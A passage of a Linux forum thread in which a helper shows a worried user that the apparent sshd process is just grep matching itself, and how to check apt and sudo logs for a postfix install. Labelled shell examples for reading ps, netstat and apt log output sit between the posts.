                      Originally posted by johndoe
                      I have never installed postfix. When uninstalled, no dependencies popped up.
                      You must have done, because it is not installed by default!
                      samhobbs.co.uk



                        #41
                        I do not have sshd installed in synaptic, yet this. Also there is a /tmp/ssh agent file present. Someone is running openssh server on my rig it seems, but well hidden. I am at a loss.
                        Code:
                        rafal@rafal-desktop:~$ service sshd status
                        sshd: unrecognized service
                        Code:
                        rafal@rafal-desktop:~$ ps aux | grep sshd
                        rafal     4142  0.0  0.0  12972  2356 pts/0    S+   18:32   0:00 grep --color=auto sshd



                          #42
                          Dude, that's not SSHD, it's grep matching itself, which is searching for sshd (sshd is an argument you passed to grep...).

                          Observe:

                          Code:
                          feathers-mcgraw@Hobbs-T440s:~$ ps aux | grep sshd
                          feather+  3251  0.0  0.0  12164  2104 pts/0    S+   17:39   0:00 grep --color=auto sshd
                          feathers-mcgraw@Hobbs-T440s:~$ ps aux | grep foo
                          feather+  3253  0.0  0.0  12164  2204 pts/0    S+   17:39   0:00 grep --color=auto foo
                          feathers-mcgraw@Hobbs-T440s:~$ ps aux | grep bananas
                          feather+  3256  0.0  0.0  12164  2072 pts/0    S+   17:40   0:00 grep --color=auto bananas
                          feathers-mcgraw@Hobbs-T440s:~$ ps aux | grep newworldorder
                          feather+  3259  0.0  0.0  12164  2100 pts/0    S+   17:40   0:00 grep --color=auto newworldorder
                          For the record, the United Nations has not broken into my flat and installed some super secret software on my computer. Here's what you would have got if SSHD was actually running:

                          Code:
                          sam@samhobbs:~$ ps aux | grep sshd
                          root      1223  0.0  0.0  61364  3064 ?        Ss   Oct20   0:00 /usr/sbin/sshd -D
                          root      2096  0.0  0.0 111844  4312 ?        Ss   17:43   0:00 sshd: sam [priv]    
                          sam       2186  0.0  0.0 111844  1892 ?        S    17:43   0:00 sshd: sam@pts/2     
                          sam       2217  0.0  0.0  11752   900 pts/2    S+   17:43   0:00 grep --color=auto sshd
                          I think you need to slow down a bit, you seem to have overwhelmed yourself with information, and confirmation bias is leading you to believe that someone has "hacked" you. It's extremely unlikely, and none of the information you have provided supports that theory.

                          BTW, you still haven't answered my question about what you said in your first post:

                          Originally posted by johndoe
                          I am getting a lot of hits from Saudi Arabia and Middle East via netstat.
                          Where's the evidence for this?
                          samhobbs.co.uk
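An added example, not code from this post or its author: two constructed ps snapshots mirroring the two listings above, with the naive count beside a count that drops the grep process itself (on a live machine, `pgrep -x sshd` answers the same question directly).

```shell
# Added example, not from the thread. Both snapshots are constructed to
# mirror the two listings in the post.

# Machine where sshd is NOT running: the only match is grep itself.
SNAP_NO_SSHD='USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
rafal     4142  0.0  0.0  12972  2356 pts/0    S+   18:32   0:00 grep --color=auto sshd'

# Machine where sshd IS running: daemon, privileged child, session child, grep.
SNAP_SSHD='USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      1223  0.0  0.0  61364  3064 ?        Ss   Oct20   0:00 /usr/sbin/sshd -D
root      2096  0.0  0.0 111844  4312 ?        Ss   17:43   0:00 sshd: sam [priv]
sam       2186  0.0  0.0 111844  1892 ?        S    17:43   0:00 sshd: sam@pts/2
sam       2217  0.0  0.0  11752   900 pts/2    S+   17:43   0:00 grep --color=auto sshd'

# Naive check: counts every line containing NAME, including the grep that is
# searching for it, so it can never return 0.
count_naive() {            # $1 = ps snapshot, $2 = process name
    printf '%s\n' "$1" | grep -c -- "$2"
}

# Honest check: skip the header and any line whose COMMAND column (field 11)
# is "grep", then count lines mentioning NAME.
count_real() {             # $1 = ps snapshot, $2 = process name
    printf '%s\n' "$1" | awk -v name="$2" '
        NR > 1 && $11 != "grep" && index($0, name) > 0 { n++ }
        END { print n + 0 }'
}

# Stand-alone demo: the first pair prints 1 and 0, the second 4 and 3.
count_naive "$SNAP_NO_SSHD" sshd; count_real "$SNAP_NO_SSHD" sshd
count_naive "$SNAP_SSHD" sshd;    count_real "$SNAP_SSHD" sshd
```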



                            #43
                            I ran netstat -a a few days back as I was looking at ways to see who is connecting to my computer. I saw the output, and used network tools to see where the IPs originated that were connected. A lot were from the Middle East. I just don't know what to do :/ I don't mean to offend anyone, just stating what I saw.

                            Code:
                            netstat -a
                            Active Internet connections (servers and established)
                            Proto Recv-Q Send-Q Local Address           Foreign Address         State
                            tcp        0      0 rafal-desktop:domain    *:*                     LISTEN
                            tcp        0      0 localhost:ipp           *:*                     LISTEN
                            tcp        0      0 192.168.0.35:49379      li240-5.members.li:http ESTABLISHED
                            tcp        0      0 192.168.0.35:33340      74.125.71.95:https      ESTABLISHED
                            tcp        0      0 192.168.0.35:44059      fra07s30-in-f22.1:https ESTABLISHED
                            tcp        0      0 192.168.0.35:37490      46.28.247.103:https     ESTABLISHED
                            tcp        0      0 192.168.0.35:40808      46.28.247.88:https      TIME_WAIT
                            tcp        0      0 192.168.0.35:49376      li240-5.members.li:http ESTABLISHED
                            tcp        0      0 192.168.0.35:49825      46.28.247.109:https     ESTABLISHED
                            tcp        0      0 192.168.0.35:50524      46.28.247.98:https      TIME_WAIT
                            tcp        0      0 192.168.0.35:40810      46.28.247.88:https      TIME_WAIT
                            tcp        0      0 192.168.0.35:49380      li240-5.members.li:http TIME_WAIT
                            tcp        0      0 192.168.0.35:49378      li240-5.members.li:http ESTABLISHED
                            tcp        0      0 192.168.0.35:49377      li240-5.members.li:http ESTABLISHED
                            tcp        0      0 192.168.0.35:44458      li203-141.members:https ESTABLISHED
                            tcp        0      0 192.168.0.35:52105      192.0.80.241:https      ESTABLISHED
                            tcp6       0      0 ip6-localhost:ipp       [::]:*                  LISTEN
                            tcp6       1      0 ip6-localhost:36936     ip6-localhost:ipp       CLOSE_WAIT
                            udp        0      0 *:mdns                  *:*
                            udp        0      0 *:40210                 *:*
                            udp        0      0 rafal-desktop:domain    *:*
                            udp        0      0 *:ipp                   *:*
                            udp6       0      0 [::]:45283              [::]:*
                            udp6       0      0 [::]:mdns               [::]:*
                            This was VERY long, computers and servers. So I started going through the IPs to see where they were coming from.
                            Last edited by raffytaffy; Oct 25, 2014, 11:08 AM.
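An added example, not from this post or its author: an awk classifier that sorts a `netstat -a` listing into listening services, connections this machine opened outward, and connections opened inward from elsewhere. The sample is constructed from the listing above plus one made-up line (`192.168.0.35:ssh`) to show what an inbound session would look like; the listing above contains none.

```shell
# Added example, not from the thread. The sample is constructed from the
# post's netstat output; the 192.168.0.35:ssh line is made up to show an
# inbound session.
NETSTAT_SAMPLE='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 rafal-desktop:domain    *:*                     LISTEN
tcp        0      0 localhost:ipp           *:*                     LISTEN
tcp        0      0 192.168.0.35:49379      li240-5.members.li:http ESTABLISHED
tcp        0      0 192.168.0.35:37490      46.28.247.103:https     ESTABLISHED
tcp        0      0 192.168.0.35:40808      46.28.247.88:https      TIME_WAIT
tcp        0      0 192.168.0.35:ssh        192.168.0.20:51234      ESTABLISHED
tcp6       0      0 ip6-localhost:ipp       [::]:*                  LISTEN
udp        0      0 *:mdns                  *:*'

# Print one line per socket: KIND <tab> LOCAL <tab> FOREIGN, where KIND is
#   listening - a local service waiting for connections (the "server" part)
#   outbound  - this machine connected OUT: the foreign side is a service
#               port such as http or https, the local side an ephemeral port
#   inbound   - someone connected IN: the foreign side is an ephemeral port
classify_netstat() {       # $1 = netstat -a text
    printf '%s\n' "$1" | awk '
        $1 !~ /^(tcp|udp)6?$/ { next }            # skip headers and unix sockets
        {
            nf = split($5, f, ":"); fport = f[nf]   # text after the last ":" is the port
            if ($6 == "LISTEN" || fport == "*")
                kind = "listening"
            else if (fport !~ /^[0-9]+$/ || fport + 0 < 1024)
                kind = "outbound"                   # foreign side is a service port
            else
                kind = "inbound"                    # foreign side is an ephemeral port
            printf "%s\t%s\t%s\n", kind, $4, $5
        }'
}

# Count sockets of one kind, e.g. count_kind "$NETSTAT_SAMPLE" outbound
count_kind() {             # $1 = netstat -a text, $2 = kind
    classify_netstat "$1" | awk -v k="$2" '$1 == k { n++ } END { print n + 0 }'
}

classify_netstat "$NETSTAT_SAMPLE"
```

Run it on a real machine with `classify_netstat "$(netstat -a)"`; the web-browsing connections in the listing above all come out as outbound, which is what a busy desktop looks like.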



                              #44
                              No offence, but until you can provide me with the actual evidence that supported your conclusion, I'm going to assume you misinterpreted what you saw, like you misinterpreted the output from netstat -l and ps aux you have posted.

                              Making an effort to learn about your computer is a really good thing, just slow down and try not to jump to so many wild conclusions.
                              samhobbs.co.uk



                                #45
                                Also, since I think it might be good for you to be shown that you did install postfix, please run these two commands:
                                Code:
                                cat /var/log/apt/history.log | grep -C 5 postfix
                                Code:
                                for log in /var/log/apt/history.log.* ; do echo $log && zcat $log | grep -C 5 postfix ; done
                                This searches for postfix in each one of your log files for apt (the package management utility) and returns 5 lines either side of any matches.

                                I got this:
                                Code:
                                sam@samhobbs:/var/log/apt$ cat history.log | grep -C 5 postfix
                                sam@samhobbs:/var/log/apt$ for log in /var/log/apt/history.log.* ; do echo $log && zcat $log | grep -C 5 postfix ; done
                                /var/log/apt/history.log.1.gz
                                /var/log/apt/history.log.2.gz
                                /var/log/apt/history.log.3.gz
                                /var/log/apt/history.log.4.gz
                                /var/log/apt/history.log.5.gz
                                /var/log/apt/history.log.6.gz
                                /var/log/apt/history.log.7.gz
                                Commandline: apt-get install phpmyadmin
                                Install: libjs-jquery-mousewheel:amd64 (8-2, automatic), libjs-jquery-metadata:amd64 (8-2, automatic), libjs-jquery-cookie:amd64 (8-2, automatic), libjs-jquery-event-drag:amd64 (8-2, automatic), dbconfig-common:amd64 (1.8.47+nmu1, automatic), php5-mcrypt:amd64 (5.4.6-0ubuntu3, automatic), libmcrypt4:amd64 (2.5.8-3.1, automatic), phpmyadmin:amd64 (4.0.6-1), libjs-jquery-ui:amd64 (1.10.1+dfsg-1, automatic), php5-json:amd64 (1.3.1+dfsg-2, automatic), libjs-underscore:amd64 (1.4.4-2ubuntu1, automatic), libjs-jquery-tablesorter:amd64 (8-2, automatic), php-gettext:amd64 (1.0.11-1, automatic), libjs-codemirror:amd64 (2.23-1, automatic), javascript-common:amd64 (11, automatic), php5-gd:amd64 (5.5.3+dfsg-1ubuntu2.2, automatic)
                                End-Date: 2014-03-25  16:54:36
                                
                                Start-Date: 2014-03-25  18:00:39
                                Commandline: apt-get install postfix
                                Install: postfix:amd64 (2.10.2-1)
                                End-Date: 2014-03-25  18:00:46
                                
                                Start-Date: 2014-03-25  18:05:17
                                Commandline: apt-get install dovecot-common dovecot-imapd
                                Install: dovecot-common:amd64 (2.1.7-7ubuntu3), dovecot-core:amd64 (2.1.7-7ubuntu3, automatic), dovecot-imapd:amd64 (2.1.7-7ubuntu3)
                                As you can see, there was a match in my oldest logfile on the server: postfix was installed on 25th March 2014. The command used to install it was apt-get install postfix (it wasn't installed as a dependency).

                                Depending on when you installed it, you may be able to see the log entry for your sudo command in /var/log/auth.log (or older versions) by using a command like this:

                                Code:
                                zcat auth.log.4.gz | grep "sudo" | grep install
                                Unfortunately I can't give you a specific example matching when I installed postfix on my server because those log files are so old that they've been deleted.

                                Each time sudo is used a log entry is made like this:
                                Code:
                                Oct  9 22:47:30 samhobbs sudo:      sam : TTY=pts/2 ; PWD=/etc/apache2/sites-enabled ; USER=root ; COMMAND=/usr/bin/apt-get update
                                So if you did it recently, it might still be in your logs. Maybe that'll let you relax a bit.
                                samhobbs.co.uk
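An added example, not from this post or its author: an awk parser for the apt history.log record format shown above that reports whether a package was asked for on the command line or pulled in as an "automatic" dependency, plus a companion filter for the sudo lines in auth.log. The sample logs are constructed from the records quoted in the post; the timestamps that the post does not show and the second sudo line are made up.

```shell
# Added example, not from the thread. APT_HISTORY and AUTH_SAMPLE are built
# from the records quoted in the post; unseen timestamps and the second sudo
# line are made up.
APT_HISTORY='Start-Date: 2014-03-25  16:54:12
Commandline: apt-get install phpmyadmin
Install: dbconfig-common:amd64 (1.8.47+nmu1, automatic), phpmyadmin:amd64 (4.0.6-1)
End-Date: 2014-03-25  16:54:36

Start-Date: 2014-03-25  18:00:39
Commandline: apt-get install postfix
Install: postfix:amd64 (2.10.2-1)
End-Date: 2014-03-25  18:00:46'

AUTH_SAMPLE='Oct  9 22:47:30 samhobbs sudo:      sam : TTY=pts/2 ; PWD=/etc/apache2/sites-enabled ; USER=root ; COMMAND=/usr/bin/apt-get update
Oct  9 22:51:02 samhobbs sudo:      sam : TTY=pts/2 ; PWD=/home/sam ; USER=root ; COMMAND=/usr/bin/apt-get install postfix'

# Read an apt history log on stdin; print DATE, explicit|automatic, COMMAND for
# every transaction whose Install: line contains the package ("automatic" means
# apt pulled it in as a dependency). Rotated logs: zcat history.log.*.gz | ...
apt_installs() {           # $1 = package name
    awk -v pkg="$1" '
        BEGIN { RS = ""; FS = "\n" }              # one blank-separated record per transaction
        {
            date = cmd = inst = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^Start-Date: /)  date = substr($i, 13)
                if ($i ~ /^Commandline: /) cmd  = substr($i, 14)
                if ($i ~ /^Install: /)     inst = substr($i, 10)
            }
            n = split(inst, e, /\), */)           # entries: "name:arch (version[, automatic])"
            for (j = 1; j <= n; j++) {
                name = e[j]; sub(/[ :].*/, "", name)
                if (name == pkg) {
                    how = (e[j] ~ /, automatic/) ? "automatic" : "explicit"
                    printf "%s\t%s\t%s\n", date, how, cmd
                }
            }
        }'
}

# Read auth.log on stdin; print DATE, USER, COMMAND for each sudo run of
# "apt-get install <package>" (only as far back as log rotation keeps it).
sudo_installs() {          # $1 = package name (used as a plain regex)
    awk -v pkg="$1" '
        / sudo: / && $0 ~ ("COMMAND=.*apt-get install.*" pkg) {
            match($0, /COMMAND=/)
            printf "%s %s %s\t%s\t%s\n", $1, $2, $3, $6, substr($0, RSTART + 8)
        }'
}
```

Usage: `apt_installs postfix < /var/log/apt/history.log` and `zcat /var/log/auth.log.*.gz | sudo_installs postfix`.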
